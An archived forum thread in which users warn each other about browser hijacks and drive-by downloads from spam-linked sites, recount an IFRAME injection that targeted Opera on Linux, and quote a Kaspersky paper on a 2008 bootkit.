Jump to content

Browser hijacks, drive-by downloads, etc.


Recommended Posts

Some spam tries to get you to an exploited site (the fake "CNN Alerts", etc). It seems sometimes it is just a 'placeholder', no actual website is linked (just practicing, reducing levels of caution, intended hack failed, domain registration still in progress, etc. etc), sometimes an unwitting host has been alerted and has removed the offending page, but too many times "something" is lurking for the unwary or the overconfident. (Heh, congratulating yourself/gloating on your prescience in not okaying that "required codec" on offer while the real exploit silently does its stuff through some unpatched hole in your security is not a good look).

Some of that stuff is described through the links at http://explabs.com/about/resCenter/video_library.asp (yeah, yeah, they'd like you to buy LinkScanner Pro and they have a vested interest in scaring you until you do but there's information on offer which is the point of what I'm saying).

Not to be confused with the websites of the fake watch peddlers, the pharms merchants and the like - they (mostly) just want your money, certainly your confirmed address too, occasionally your identity and the rest of your money and any other disposable assets. But not/hardly ever (yet) your computer, as such. That would be bad for business.

Forewarned is forearmed (ouch! ... no, no, the *other* forearmed). Sun Tzu reckoned if you did't know your enemy you couldn't hope to win more than half the time. Make that "never" when the enemy, in fact, knows you and you don't know yourself/your environment. And they're more desperate than you.

Link to comment
Share on other sites

I'd like to add that some exploits are really nasty. There was one on one of my regular wholesalers who got cracked that had an IFRAME injection scri_pt.

It was intelligent enough to detect that I was using Opera on Linux and sent a payload that tried to root my system!!!!!!!!! :o

(that Opera hole was plugged since, but still.... don't see many *nix capable exploits)

Link to comment
Share on other sites

  • 4 months later...

Further on the evolution of malware, a Kapersky lab-viruslist paper on the "bootkit" Bootkit: the challenge of 2008

...The curious incident of the rebooting computers

In the middle of August, complaints started to appear on Internet forums from users who said their computers were rebooting themselves after a range of sites had been visited. What caused the reboot was unclear. There were no common factors found in the hardware and software used. Only a single possible explanation remained: the cause of the reboot had to be on the sites themselves.

An initial inspection of the suspicious sites revealed nothing – the sites appeared to be innocuous. In the majority of cases, malicious users who want to infect victim machines hack legitimate sites and place links to their resources which contain exploits on these sites. This technique is known as a "drive-by download’; when a user views the infected site, malicious code will be installed to the victim machine without the user’s knowledge or consent. However, nothing was detected on this site – no suspicious iframes, no suspicious scripts. ...

Link to comment
Share on other sites


This topic is now archived and is closed to further replies.

  • Create New...